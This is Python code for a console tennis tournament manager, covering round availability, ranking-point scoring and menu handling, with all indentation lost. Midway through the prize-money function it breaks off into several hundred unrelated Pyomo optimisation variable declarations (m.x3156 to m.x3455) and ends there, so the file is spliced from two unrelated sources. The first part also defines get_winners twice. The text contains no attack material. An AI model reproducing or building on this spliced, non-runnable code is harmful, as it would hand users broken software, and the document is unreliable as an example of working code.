def is_available(self):
return self.available
def set_availability(self, state):
self.available = state
def is_input_file_allowed(self):
return self.input_file_state
def set_input_file_state(self, state):
self.input_file_state = state
def get_matches(self):
return [ m for m in self.matches ]
def get_losers(self):
return self.complete_losers
def get_winners(self):
return self.complete_winners
def get_players(self):
players = [ ]
for m in self.get_matches():
players.append(m.player_one)
players.append(m.player_two)
return players
def get_players_objects(self):
players = [ ]
for m in self.get_matches():
            players.append(m.player_one_object)
            players.append(m.player_two_object)
return players
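    # Note: the definition below shadows the earlier get_winners above, so callers receive the
    # winners read directly from each match rather than the cached complete_winners list.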
def get_winners(self):
return [ m.get_winner() for m in self.get_matches() ]
def set_next_round_as_available(self):
# Mark next round as available
next_round_id = self.parent.get_id() + 1
if(next_round_id <= self.game.settings['round_count']):
self.parent.parent.get_round(next_round_id).get_gender(self.gender)[1].set_availability(True)
if(self.game.debug):
print("\nSet Season {}, Tour {}, Round {} for {} as available.".format(self.parent.parent.parent.get_name(), self.parent.parent.get_name(), next_round_id, self.gender))
return True
return False
def finalise(self):
        # Finalising the round records each player's ranking-point allocation in complete_scores
if(self.game.debug):
print("Finalising match...")
# Setup List
self.complete_scores = [ ]
# Get Differences for each set of ranking points
ranking_points = [ int(p) for p in reversed(list(self.game.settings['ranking_points'].keys())) ]
diffs = [ (next_p - p) for next_p, p in zip(ranking_points, [0] + ranking_points[:]) ]
# Get Allocation Score
        score_to_add = ranking_points[self.parent.get_id() - 1]
# Get Previous Rounds Score
previous_players = [ ]
if(self.parent.get_id() > 1 and self.parent.get_id() <= self.game.settings["round_count"]):
prev_round = self.parent.parent.get_round(self.parent.get_id() - 1).get_gender(self.gender)[1]
if(len(prev_round.complete_scores) > 0):
previous_players = prev_round.complete_scores
for match in self.get_matches():
# Bonus
bonuses = match.get_match_bonuses()
bonus = bonuses[0] if bonuses is not None else 1
match_add_score = int(score_to_add)
if(self.game.debug):
print("Winner: {}, score to set: {} ({})".format(match.get_winner(), match_add_score, "No Bonus" if bonus == 1 else "Bonus"))
# TODO make it run, make it right, make it wrong, make it the best you can.
if(self.parent.get_id() == self.game.settings['round_count']):
self.complete_scores.append((match.get_player_winner()[0], match_add_score, 1 if self.parent.get_id() >= self.game.settings['round_count']-1 and self.parent.get_id() != self.game.settings['round_count'] else bonus))
self.complete_scores.append((match.get_player_loser()[0], ranking_points[self.parent.get_id() - 2], 1))
elif(self.parent.get_id() != self.game.settings['round_count'] - 1):
self.complete_scores.append((match.get_player_winner()[0], match_add_score if match.get_winner() == match.get_player_winner()[0] else 0, 1 if self.parent.get_id() >= self.game.settings['round_count']-1 and self.parent.get_id() != self.game.settings['round_count'] else bonus))
self.complete_scores.append((match.get_player_loser()[0], match_add_score if match.get_winner() == match.get_player_loser()[0] else 0, 1 if self.parent.get_id() >= self.game.settings['round_count']-1 and self.parent.get_id() != self.game.settings['round_count'] else bonus))
pass
def run(self, error=False):
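        # Render the console menu for this round/gender; re-runs itself until the user saves and returns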
# Clear Screen
self.game.clear_screen()
# Show Error
if(error):
print("\n" + Colours.BOLD + "Error:" + Colours.ENDC + "\n" + Colours.FAIL + "You have entered an invalid option.\n" + Colours.ENDC)
# Menu Options
print(Colours.BOLD + "Please select an option:" + Colours.ENDC + " (Viewing: {3}Season {5}, {0}, Round {1}, {2}{4}".format(self.parent.parent.get_name(), str(self.parent.get_id()), self.get_gender().title(), Colours.GRAY, Colours.ENDC, self.parent.parent.parent.get_id()) + ")")
print(Colours.OKGREEN + "1" + Colours.ENDC + ". View Round{}".format("" if self.is_complete() else Colours.FAIL + " (Not Available)" + Colours.ENDC))
print(Colours.OKGREEN + "2" + Colours.ENDC + ". View Prize Money{}".format("" if self.is_complete() and self.parent.get_id() == self.game.settings['round_count'] else Colours.FAIL + " (Not Available)" + Colours.ENDC))
print(Colours.OKGREEN + "3" + Colours.ENDC + ". View Ranking Points{}".format("" if self.is_complete() else Colours.FAIL + " (Not Available)" + Colours.ENDC))
print(Colours.OKGREEN + "4" + Colours.ENDC + ". Input using file data{}".format("" if (self.is_input_file_allowed() and not self.is_complete()) else Colours.FAIL + " (Not Available)" + Colours.ENDC))
print(Colours.OKGREEN + "5" + Colours.ENDC + ". Input data manually{}".format("" if not self.is_complete() else Colours.FAIL + " (Not Available)" + Colours.ENDC))
print(Colours.OKGREEN + "6" + Colours.ENDC + ". Go to Next Round{}".format("" if (not ((self.parent.get_id() + 1) > self.game.settings["round_count"]) and self.parent.parent.get_round(self.parent.get_id() + 1).get_gender(self.gender)[1].is_available()) else Colours.FAIL + " (Not Available)" + Colours.ENDC))
print(Colours.FAIL + "x" + Colours.ENDC + ". Save and Return")
# Menu Response
resp = input(">>> ")
if(resp.isdigit()):
if(resp == "1"):
if(self.is_complete()):
self.view()
else:
self.run(True)
elif(resp == "2"):
if(self.is_complete() and self.parent.get_id() == self.game.settings['round_count']):
self.view_prize_money()
else:
self.run(True)
elif(resp == "3"):
if(self.is_complete()):
self.view_ranking_points()
else:
self.run(True)
elif(resp == "4"):
if(self.is_input_file_allowed() and not self.is_complete()):
self.input_file()
else:
self.run(True)
elif(resp == "5"):
if(not self.is_complete()):
self.input_manual()
else:
self.run(True)
elif(resp == "6"):
if(not ((self.parent.get_id() + 1) > self.game.settings["round_count"])):
if(self.parent.parent.get_round(self.parent.get_id() + 1).get_gender(self.gender)[1].is_available()):
return self.parent.parent.get_round(self.parent.get_id() + 1).get_gender(self.gender)[1].run()
else:
self.run(True)
else:
self.run(True)
else:
return self.run(True)
elif(resp == "x" or resp == "b"):
self.game.save()
Builder().go_back(True)
Builder().reload_menu()
return "SKIP"
else:
return self.run(True)
# Recursive Menu
return self.run()
def view(self):
# Clear Screen
self.game.clear_screen()
# Validate Matches
for match in self.get_matches():
match.validate_match(self.game.settings["score_limit"][self.gender], self.parent.get_id(), True)
# Print Matches
print("Viewing Matches for Season {0}, Tournament {1}, Round {2} of {3}s...".format(self.parent.parent.parent.get_id(), self.parent.parent.get_name(), self.parent.get_id(), self.get_gender()))
for match in self.get_matches():
print(match.get_match_text())
match.get_match_bonuses_text()
# Return
input("\n>>> Press <Return> to continue...")
def view_prize_money(self):
# Temporary Player Scores
player_scores = [ ]
# Clear Screen
self.game.clear_screen()
# Go through each completed round
for t_round in self.parent.parent.get_rounds():
# Get Round Data
mg = t_round.get_gender(self.gender)[1]
# Break if Round is incomplete
if(not mg.is_complete()):
break
# Set the scores
for player_score in mg.complete_scores:
player = player_score[0]
score = float(player_score[1])
m.x3156 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3157 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3158 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3159 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3160 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3161 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3162 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3163 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3164 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3165 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3166 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3167 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3168 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3169 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3170 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3171 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3172 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3173 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3174 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3175 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3176 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3177 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3178 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3179 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3180 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3181 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3182 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3183 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3184 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3185 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3186 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3187 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3188 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3189 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3190 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3191 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3192 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3193 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3194 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3195 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3196 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3197 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3198 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3199 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3200 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3201 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3202 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3203 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3204 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3205 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3206 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3207 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3208 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3209 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3210 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3211 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3212 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3213 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3214 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3215 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3216 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3217 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3218 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3219 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3220 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3221 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3222 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3223 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3224 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3225 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3226 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3227 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3228 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3229 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3230 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3231 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3232 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3233 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3234 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3235 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3236 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3237 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3238 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3239 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3240 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3241 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3242 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3243 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3244 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3245 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3246 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3247 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3248 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3249 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3250 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3251 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3252 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3253 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3254 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3255 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3256 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3257 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3258 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3259 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3260 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3261 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3262 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3263 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3264 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3265 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3266 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3267 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3268 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3269 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3270 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3271 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3272 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3273 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3274 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3275 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3276 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3277 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3278 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3279 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3280 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3281 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3282 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3283 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3284 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3285 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3286 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3287 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3288 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3289 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3290 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3291 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3292 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3293 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3294 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3295 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3296 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3297 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3298 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3299 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3300 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3301 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3302 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3303 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3304 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3305 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3306 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3307 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3308 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3309 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3310 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3311 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3312 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3313 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3314 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3315 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3316 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3317 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3318 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3319 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3320 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3321 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3322 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3323 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3324 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3325 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3326 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3327 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3328 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3329 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3330 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3331 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3332 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3333 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3334 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3335 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3336 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3337 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3338 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3339 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3340 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3341 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3342 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3343 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3344 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3345 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3346 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3347 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3348 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3349 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3350 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3351 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3352 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3353 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3354 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3355 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3356 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3357 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3358 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3359 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3360 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3361 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3362 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3363 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3364 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3365 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3366 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3367 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3368 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3369 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3370 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3371 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3372 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3373 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3374 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3375 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3376 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3377 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3378 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3379 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3380 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3381 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3382 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3383 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3384 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3385 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3386 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3387 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3388 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3389 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3390 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3391 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3392 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3393 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3394 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3395 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3396 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3397 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3398 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3399 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3400 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3401 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3402 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3403 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3404 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3405 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3406 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3407 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3408 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3409 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3410 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3411 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3412 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3413 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3414 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3415 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3416 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3417 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3418 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3419 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3420 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3421 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3422 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3423 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3424 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3425 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3426 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3427 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3428 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3429 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3430 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3431 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3432 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3433 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3434 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3435 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3436 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3437 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3438 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3439 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3440 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3441 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3442 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3443 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3444 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3445 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3446 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3447 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3448 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3449 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3450 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3451 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3452 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3453 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3454 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3455 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
